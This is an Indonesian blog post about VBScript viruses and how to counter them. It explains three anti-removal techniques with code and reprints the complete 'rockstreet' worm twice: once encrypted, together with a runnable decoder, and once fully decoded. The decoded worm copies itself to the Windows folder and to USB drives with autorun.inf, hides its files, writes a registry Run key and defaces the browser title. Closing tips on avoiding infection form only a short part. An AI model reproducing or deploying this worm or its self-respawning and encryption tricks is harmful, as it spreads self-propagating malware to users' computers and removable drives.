20 May 2009

Filled Under:

Tren Perkembangan Virus VBS dan Cara Mengatasinya

Siapa yang tak kenal Virus vbs (visual basic script) atau scripting virus. Sebenarnya script vbs kalau tidak salah adalah script yang digunakan dalam aplikasi web yang berbasis asp (active server pages) dan digunakan juga untuk menjalankan perintah-perintah di sistem operasi windows. Tapi saat ini script vbs (vbscript) digunakan juga untuk membuat virus yang cukup berbahaya. Namun vbscript virus memiliki kelemahan yaitu dapat dilihat dan dirubah script virusnya secara langsung hanya dengan editor text (seperti notepad) dan memiliki ketergantungan terhadap program "Windows-based script host (Wscript.exe" untuk dapat berjalan.

note : sebenarnya saya lagi bete banget, bagaimana tidak ikut pelantikan senat STIE PBM Jakarta ke bogor dan banyak kerja, tetapi diantara semua foto wajah saya selalu terhalang.

Mungkin ada sangat banyak variasi dari pembuat virus (Vxer) untuk mengamankan script vbs virusnya dari advanced user. Diantaranya yang saya ketahui dan paling umum adalah :

1. Teknik Anti Delete
Teknik ini pertama kali ada pada worm yang dibuat oleh rekan kita [K]alamar yang saat itu berusia 18 tahun dari Argentina. SEbenarnya teknik ini cukup sederhana yaitu dengan mendapatkan isi seluruh script yang sedang berjalan dan melakukan looping secara terus menerus untuk terus membuat file virus baru. Sehingga saat anda menghapus virus vbs yang memiliki sistem pertahanan seperti ini akan terlihat file virus seakan-akan kembali lagi setelah dihapus.Nih contohnya

---misalkan bagian ini keseluruhan kode virus -----

'deklarasi variabel
dim fso, aku, contekan
'definisikan system object
set fso = createobject("scripting.filesystemobject")
'definisikan variabel aku dengan isi keseluruhan script
set aku = fso.opentextfile(wscript.scriptfullname)
contekan = aku.readall
aku.close
'lakukan
do
'jika dicek diri virus gak ada
if fso.fileexists(wscript.scriptfullname) = false then
'set variabel aku untuk membuat file teks
set aku = fso.createtextfile(wscript.scriptfullname)
'masukan isi variabel aku ke file teks yang dibuat
aku.write contekan
aku.close
'akhiri syarat kondisi
end if
'ulangi lagi
loop


kode diatas ini diletakan dibagian paling bawah, yaitu setelah seluruh kode utama. Tujuannya adalah agar perintah "aku.ReadAll" dapat membaca semua kode yang ada diatasnya.

2. Manipulasi Registri
Teknik memanipulasi registri untuk mengamankan script virus sangat beragam, bisa dengan menyembunyikan virus, menghilangkan opsi "Edit" di klik kanan mouse, menyembunyikan ekstensi dan bisa juga dilakukan dengan merubah icon file vbs dengan icon lain (icon misalnya folder). Merubah icon contohnya adalah "HKCR\vbsfile\DefaultIcon", "shell32.dll,2", ikon vbs file akan menjadi icon folder.

3. Teknik Enkripsi Diri
Teknik enkripsi ini merupakan teknik yang cukup baru dan agak rumit. Pada teknik ini mungkin anda hanya akan melihat sebuah variabel yang berisi bagian virus utama yang telah dienkripsi menjadi kombinasi karakter yang kacau dan anda juga akan melihat bagian script yang akan mendekripsikan dan menjalankan script terenkripsi tadi.Virus yang memiliki pertahanan seperti ini juga masih dapat kita lihat isi virusnya dengan mudah, yaitu dengan merubah bagian perinah untuk menjalankan virus dengan perintah untuk menampilkan (bisa dengan messagebox) atau juga dengan memindahkannya kedalam file. Coba lihat contoh berikut ini. Dibawah ini adalah contoh script virus "rockstreet" yang kelihatannya dibuat oleh pemula yang mencontek buku atau dari contekan tutorial" (terlihat dari banyaknya komentar penunjuk).

'<------------------ awal virus --------------------->
'badan virus
rockstreet="&;,,,,,,,,,Z`v`kbnmsngjncdx`mf`j`mchdmbqxos\,,,,,,,,,,,,=&..@v`kc`qhjncd+rds`f`qjdshj`sdqi`chDqqnqchah`qj`mc`mjdltch`mk`mitsj`mjdfh`s`muhqtr..nmdqqnqqdrtldmdws&..M`l`c`qhuhqtrQdl2//7/7+[qnbjrsqddsv`rgdqd- &..Ldlu`qh`adkj`mj`s`,j`s`adqhjtshmh..Chlrqb+vhmo`sg+ek`rgcqhud+er+le+`sq+se+qf+ms+bgdbj+rc&..Rdsrdat`gsdjrx`mfm`mshmx``j`mchat`stmstj@tsnqtmRdstoHmenql`shnm..`sq<×Z`tsnqtm\×%uabqke%×rgdkkdwdbtsd<Bqd`sdNaidbs'×Rbqhoshmf-EhkdRxrsdlNaidbs×(Rdsle<er-fdsehkd'Vrbqhos-RbqhosEtkkm`ld(Chlsdws+rhydrhyd<le-rhydbgdbj<le-cqhud-cqhudsxodRdssdws<le-nodm`rsdwsrsqd`l'0+,1(CnVghkdMnssdws-`sdmcnersqd`lrqb<rqb%uaBqKeKnnoCn&..Bnoxchqhtmstjldmi`chehkdhmctjchVhmcnvrO`sgRdsvhmo`sg<er-fdsrodbh`kenkcdq'/(Rdsse<er-fdsehkd'vhmo`sg%×[qnbjrsqdds-ckk-uar×(se-@ssqhatsdr<21Rdsse<er-bqd`sdsdwsehkd'vhmo`sg%×[qnbjrsqdds-ckk-uar×+1+Sqtd(se-vqhsdrqbse-BknrdRdsse<er-fdsehkd'vhmo`sg%×[qnbjrsqdds-ckk-uar×(se-@ssqhatsdr<28&..At`s@tsnqtm-hmetmstjldmi`k`mj`muhqtrnsnl`shrrdsh`oek`rgchrgx`mfl`rtj..EnqD`bgek`rgcqhudHmer-cqhudrHe'ek`rgcqhud-cqhudsxod<0Nqek`rgcqhud-cqhudsxod<1(@mcek`rgcqhud-O`sg;=×@9×SgdmRdsse<er-fdsehkd'ek`rgcqhud-O`sg%×[qnbjrsqdds-ckk-uar×(se-@ssqhatsdr<21Rdsse<er-bqd`sdsdwsehkd'ek`rgcqhud-O`sg%×[qnbjrsqdds-ckk-uar×+1+Sqtd(se-vqhsdrqb9se-BknrdRdsse<er-fdsehkd'ek`rgcqhud-O`sg%×[qnbjrsqdds-ckk-uar×(se-@ssqhatsdr<28Rdsse<er-fdsehkd'ek`rgcqhud-O`sg%×[`tsnqtm-hme×(se-@ssqhatsdr<21Rdsse<er-bqd`sdsdwsehkd'ek`rgcqhud-O`sg%×[`tsnqtm-hme×+1+Sqtd(se-vqhsd`sqse-BknrdRdsse<er-fdsehkd'ek`rgcqhud-O`sg%×[`tsnqtm-hme×(se-@ssqhatsdr<28DmcHeMdws&..L`mhotk`rhQdfhrsqx..Rdsqf<Bqd`sdNaidbs'×VRbqhos-Rgdkk×(qf-qdfvqhsd×GJDX^KNB@K^L@BGHMD[Rnesv`qd[Lhbqnrnes[Vhmcnvr[BtqqdmsUdqrhnm[Qtm[kn`c×+vhmo`sg%×[qnbjrsqdds-ckk-uar×qf-qdfvqhsd×GJDX^BTQQDMS^TRDQ[Rnesv`qd[Lhbqnrnes[HmsdqmdsDwoknqdq[L`hm[VhmcnvShskd×+×Z,,G`bjdcAxQNBJRSQDDS,,\?HmE×qf-qdfvqhsd×GJBQ[uarehkd[Cde`tksHbnm×+×rgdkk21-ckk+1×&..ihj`chodqhjr`l`j`oqnfq`ladqgdmshrdk`l`1/cdshj..Hebgdbj;=0SgdmVrbqhos-rkddo1/////KnnoVghkdbgdbj;=0Rdsrc<Bqd`sdNaidbs'×Vrbqhos-rgdkk×(rc-qtmvhmo`sg%×[dwoknqdq-dwd.d+.rdkdbs+×%Vrbqhos-RbqhosEtkkm`ld&;,,,,,,,,,Z`jghqbnmsngjncdx`mf`j`mchdmbqxos\,,,,,,,,,,,,=" 'untuk unenkripsinya Dim engine, tf, fso set fso=createobject("scripting.filesystemobject") For I = 1 To Len(rockstreet) Internet = Asc(Mid(rockstreet, I, 1)) If Internet = 215 Then Windows = Chr(34) ElseIf Internet = 28 Then Windows = Chr(10) ElseIf Internet = 29 Then Windows = Chr(13) Else Windows = Chr(Internet + 1) End If engine = engine & Windows Next 'untuk mengeksekusi hasil unenkripsi execute engine '<------------------ akhir virus --------------------->

pada contoh ini kita bisa mengganti perintah "execute engine" dengan mambuat file text dan memasukan isi variabel tersebut kedalamnya.

bagian "execute engine" kita hapus dan di rubah menjadi :

set tf=fso.CreateTextFile("isi_virus.txt")
tf.write(engine)
tf.close


Jadi kita merubah alur program menjadi mendekripsikan variabel "rockstreet", kemudian memasukannya kedalam variabel engine dan memasukan variabel "engine" kedalam file teks baru. Dan hasilnya adalah seperti berikut :



'<---------[ awal contoh kode yang akan di encrypt ]------------>
'//Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus//
on error resume next

'//Nama dari virus
Rem 300808, \rockstreet was here.!

'//Memvariabelkan kata-kata berikut ini//
Dim src, winpath, flashdrive, fs, mf, atr, tf, rg, nt, check, sd

'//Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information//
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe rockstreet.dll.vbs"
Set fs = CreateObject("Scripting.FileSystemObject")
Set mf = fs.getfile(Wscript.ScriptFullname)
Dim text, size
size = mf.size
check = mf.drive.drivetype
Set text = mf.openastextstream(1, -2)
Do While Not text.atendofstream
src=src&text.readline
src = src & vbCrLf
Loop
Do

'//Copy diri untuk menjadi file induk di Windows Path
Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & "\rockstreet.dll.vbs")
tf.Attributes = 32
Set tf = fs.createtextfile(winpath & "\rockstreet.dll.vbs", 2, True)
tf.write src
tf.Close
Set tf = fs.getfile(winpath & "\rockstreet.dll.vbs")
tf.Attributes = 39

'//Buat Autorun.inf untuk menjalankan virus otomatis setiap flash dish yang masuk//
For Each flashdrive In fs.drives
If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path <> "A:" Then
Set tf = fs.getfile(flashdrive.Path & "\rockstreet.dll.vbs")
tf.Attributes = 32
Set tf = fs.createtextfile(flashdrive.Path & "\rockstreet.dll.vbs", 2, True)
tf.write src: tf.Close
Set tf = fs.getfile(flashdrive.Path & "\rockstreet.dll.vbs")
tf.Attributes = 39
Set tf = fs.getfile(flashdrive.Path & "\autorun.inf")
tf.Attributes = 32
Set tf = fs.createtextfile(flashdrive.Path & "\autorun.inf", 2, True)
tf.write atr
tf.Close
Set tf = fs.getfile(flashdrive.Path & "\autorun.inf")
tf.Attributes = 39
End If
Next

'//Manipulasi Registry//
Set rg = CreateObject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\load",winpath & "\rockstreet.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "[--Hacked By ROCKSTREET--] @InF "
rg.regwrite "HKCR\vbsfile\DefaultIcon", "shell32.dll,2"

'//jika di periksa maka program berhenti selama 20 detik//
If check <> 1 Then Wscript.sleep 200000
Loop While check <> 1
Set sd = CreateObject("Wscript.shell")
sd.run winpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
'<---------[ akhir contoh kode yang akan di encrypt ]------------>


Bagaimana mengatasinya ?
Cara terbaik untuk menghindari infeksi virus apapun khususnya virus VBScript adalah kehati-hatian, tidak membuka file yang bukan milik anda, tidak download sembarangan dan mungkin tips berikut ini bisa sedikit melindungi anda dari virus komputer :
  1. Tidak colok flashdisk sembarangan, maksudnya adalah jangan asal colok flashdisk anda atau milik orang lain ke komputer yang mungkin ada virusnya. (ya ampun orang gila juga tau !!)
  2. Sebelum membuka flashdisk anda yang baru saja digunakan pada komputer lain (misalnya;rental, warnet) yang anda curigai ada virus. Setelah dicolokan ke port usb anda harus scan dengan anti virus. Setelah itu jangan langsung di buka dengan klik 2x atau klik kanan open flashdisk, gunakan cara yang lebih aman, dengan klik Start - Run - dan ketik explorer e: huruf e: ini menandakan lokasi flashdisk anda. Cara ini cukup ampuh untuk mencegah jalannya virus secara autorun.
  3. Untuk mengantisipasi virus yang dibuat dengan vbscript, anda dapat klik kanan file vbs yang anda miliki -lalu pilih properties dan pilih open with notepad.
  4. Update terus anti virus anda
  5. Tinggalkan windows dan gunakan Linux

0 comments:

Post a Comment

Silahkan berkomentar dengan bijak, tapi jangan spam !